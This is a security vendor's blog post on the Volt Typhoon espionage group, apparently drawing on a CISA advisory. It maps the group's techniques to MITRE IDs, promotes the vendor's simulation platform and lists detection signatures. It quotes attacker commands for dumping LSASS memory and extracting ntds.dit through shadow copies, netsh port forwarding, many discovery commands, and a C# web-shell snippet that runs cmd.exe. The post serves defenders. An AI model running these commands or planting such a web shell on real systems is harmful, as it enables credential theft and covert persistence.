Huseyin Can YUCEEL | 6 MIN READ

LAST UPDATED ON FEBRUARY 08, 2024

Volt Typhoon: The Chinese APT Group Abuse LOLBins for Cyber Espionage

On May 24th, 2023, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on a state-sponsored Chinese APT group, Volt Typhoon [1]. Volt Typhoon threat actors focus on cyber espionage campaigns that target critical infrastructure organizations in the United States and Asia region. For their malicious operations, the APT group primarily uses Living Off The Land Binaries (LOLBins) to evade detection and remain undetected in their target's network.

In this blog post, we explained the tools and techniques used by Volt Typhoon and how they abuse Living Off The Land Binaries (LOLBins).

Simulate State-Sponsored Cyber Threats with 14-Day Free Trial of Picus Platform

Volt Typhoon: PRC State-Sponsored Cyber Espionage Group

Volt Typhoon (also known as BRONZE SILHOUETTE) is a People's Republic of China (PRC) state-sponsored APT group that focuses on stealthy and targeted cyber espionage campaigns against critical infrastructure organizations. The threat group has been actively targeting communications, construction, education, government, information technology, manufacturing, maritime, transportation, and utility sectors for nearly two years.

The main objective of Volt Typhoon is to collect and exfiltrate sensitive information while avoiding detection. For this purpose, the APT group uses living-off-the-land techniques to mask their malicious activities as legitimate operations. The typical espionage campaign for Volt Typhoon follows initial access, living-off-the-land reconnaissance, lateral movement, and data exfiltration through C2 channels, in this order. In each step, adversaries use defense evasion techniques to hide their tracks.

Techniques and LOLBins used by Volt Typhoon

Initial Access

T1078 Valid Accounts & T1190: Exploit Public-Facing Application

Volt Typhoon gains initial access to their target's environment via stolen credentials of valid accounts. Also, Volt Typhoon is known to exploit public-facing Fortinet FortiGuard devices, ManageEngine ADSelfService Plus CVE-2021-40539 RCE, and FatPipe CVE-2021-27860 RCE vulnerabilities for initial access.

Execution

T1047 Windows Management Instrumentation

Adversaries use Windows Management Instrumentation for discovery, credential dumping, and command execution.

//Information gathering from compromised host
wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename

//Extracting ntds.dit for credential dumping
wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full <filepath>

T1059 Command and Scripting Interpreter

Threat actors use PowerShell and Windows Command Shell to execute malicious commands in compromised hosts.

//Copying volume shadow copies
cmd /c vssadmin create shadow /for=C: > <filepath>

//Port forwarding for defense evasion
cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=<internal_ip_address> connectport=8443 protocol=tcp"

//Dumping LSASS memory for credential access
cmd.exe /c powershell -exec bypass -W hidden -nop -E rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 552 C:\Windows\Temp\vmware-vhost.dmp full

Persistence

T1505.003 Server Software Component: Web Shell

Volt Typhoon deploys backdoor web shells to maintain persistent access to compromised networks. The webshell appears to be a derivative of the Awen webshell that includes AES-encrypted or base64-encoded communication capabilities for C2.

//Snippet from C# based Awen-derivative webshell

string ExcuteCmd (string arg)
{
char[] array ('c', 'm', 'd','.','e', 'x','e');
string cmd = new string (array);
ProcessStartInfo psi = new ProcessStartInfo ();
psi.FileName = cmd;
psi.Arguments = "/c "+ arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
psi.RedirectStandardError =true;
Process p = Process.Start(psi);
Streamreader stmrdr = p.StandardOutput;
string CmdOut= p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
string encmdout = Decrypt(CmdOut);
byte[] enbase64 = Encoding.Default.GetBytes(encmdout) ;
string enstr = Convert.ToBase64String(enbase64);
stmrdr.Close();
return enstr;
}

Defense Evasion

T1546 Hide Artifacts & T1070 Indicator Removal

Volt Typhoon selectively removes Windows Event Logs, system logs, artifacts, and other evidence of their malicious activity to hide their presence and limit threat- hunting activities.

Credential Access

T1003 OS Credential Dumping

As a cyber espionage group, Volt Typhoon gathers credentials of valid accounts in their victims' network. These credentials help them navigate and execute commands in the network without raising alerts. For credential dumping, they extract ntds.dit file and SYSTEM registry hive from Windows domain controllers or volume shadow copies. From the extracted ntds.dit and SECURITY files, Volt Typhoon harvest credentials of valid accounts.

//creating volume shadow copy
cmd /c vssadmin create shadow /for=C: > <filepath>

//extracting ntds.dit from shadow copy
cmd /c copy <VSS_path>\Windows\NTDS\ntds.dit C:\Windows\Temp > <filepath>

Discovery

Volt Typhoon enumerates compromised networks to discover users, hosts, and services. The gathered information is leveraged in data exfiltration and lateral movement phases of the attack campaign.

//T1033 System Owner/User Discovery

//T1069 Permission Groups Discovery

whoami

net localgroup administrators

net group /dom

net group "Domain Admins" /dom

//T1016 System Network Configuration Discovery

//T1082 System Information Discovery

arp -a

dnscmd . /enumrecords /zone {REDACTED}

ipconfig /all

netsh interface firewall show all

netsh interface portproxy show all

netsh interface portproxy show v4tov4

netsh firewall show all

netsh portproxy show v4tov4

netstat -ano

reg query hklm\software\

systeminfo

tasklist /v

wmic volume list brief

wmic service brief

wmic product list brief

wmic baseboard list full

Command and Control

T1090 Proxy

Volt Typhoon uses compromised small office/home office (SOHO) network devices as a proxy to hide the malicious traffic between their victims' network and C2 servers.

How Picus Helps Simulate Volt Typhoon Attacks?

We also strongly suggest simulating Volt Typhoon attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as Lazarus, Turla, APT33, and Sandworm, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Volt Typhoon group:

Threat ID	Threat Name	Attack Module
55804	Volt Typhoon Threat Group Campaign 2023	Endpoint
69320	Volt Typhoon Threat Group Campaign Malware Download Threat	Network Infiltration
44146	Volt Typhoon Threat Group Campaign Malware Email Threat	Email Infiltration (Phishing

Picus Threat Library also includes threats for vulnerabilities exploited by Volt Typhoon:

Threat ID

Threat Name

Attack Module

62195

Zoho ManageEngine Web Attack Campaign

Exploited Vulnerability: CVE-2021-40539

Web Application

31317

FortiProxy Web Attack Campaign

Exploited Vulnerability: CVE-2022-42475

Web Application

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address malware and vulnerabilities exploited by the Volt Typhoon APT group in preventive security controls. Currently, Picus Labs validated the following signatures for Volt Typhoon and their toolset:

Security Control	Signature ID	Signature Name
CheckPoint NGFW	0959C2951	Generic.Win32.Volt Typhoon.TC.d91bxcpv
CheckPoint NGFW	0862738FC	Backdoor.Win32.Volt Typhoon.TC.09d6atYg
CheckPoint NGFW	097ECF5F3	Backdoor.Win32.Volt Typhoon.TC.eb4esBVo
CheckPoint NGFW	0D7987079	Backdoor.Win32.Volt Typhoon.TC.8e4fOBpT
CheckPoint NGFW	0FA988343	Backdoor.Win32.Volt Typhoon.TC.66f0xuMC
CheckPoint NGFW	0EF7FD024	Backdoor.Win32.Volt Typhoon.TC.6499KMVP
Cisco FirePower	1.300594.1	MALWARE-TOOLS Win.Proxy.frp download attempt
Cisco FirePower	1.58201.2	SERVER-WEBAPP Zoho ManageEngine ADSelfService Plus RestAPI authentication bypass attempt
ForcePoint NGFW		File_Malware-Blocked
ForcePoint NGFW		HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass
ForcePoint NGFW		HTTP_CSU-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass
Fortigate AV	4050557	Riskware/HackTool
Fortigate IPS	50773	ManageEngine.ADSelfService.Plus.RestAPI.Authentication.Bypass
FortiWeb	90501371	Known Exploits
Imperva SecureSphere		CVE-2021-40539: ManageEngine ADSelfService Plus REST API URLs Remote Authentication Bypass - Endpoint 1
Palo Alto	91676	ZOHOcorp ManageEngine Improper Authentication Vulnerability
Palo Alto	585502944	tool/Win32.kryptik.bavrw
Palo Alto	585824982	Trojan/Win64.wingoobfus.b
Palo Alto	585825012	Trojan/Win64.wingoobfus.c
Snort	1.61914.1	MALWARE-TOOLS Win.Proxy.frp download attempt
Snort	1.58201.2	SERVER-WEBAPP Zoho ManageEngine ADSelfService Plus RestAPI authentication bypass attempt
TippingPoint	42855	HTTP: Fortinet FortiOS Heap Buffer Overflow Vulnerability
Trellix	0x4840c900	MALWARE: Malicious File Detected by GTI
Trellix	0x4529eb00	HTTP: Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial of the Picus Complete Security Validation Platform.

References

[1] "People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a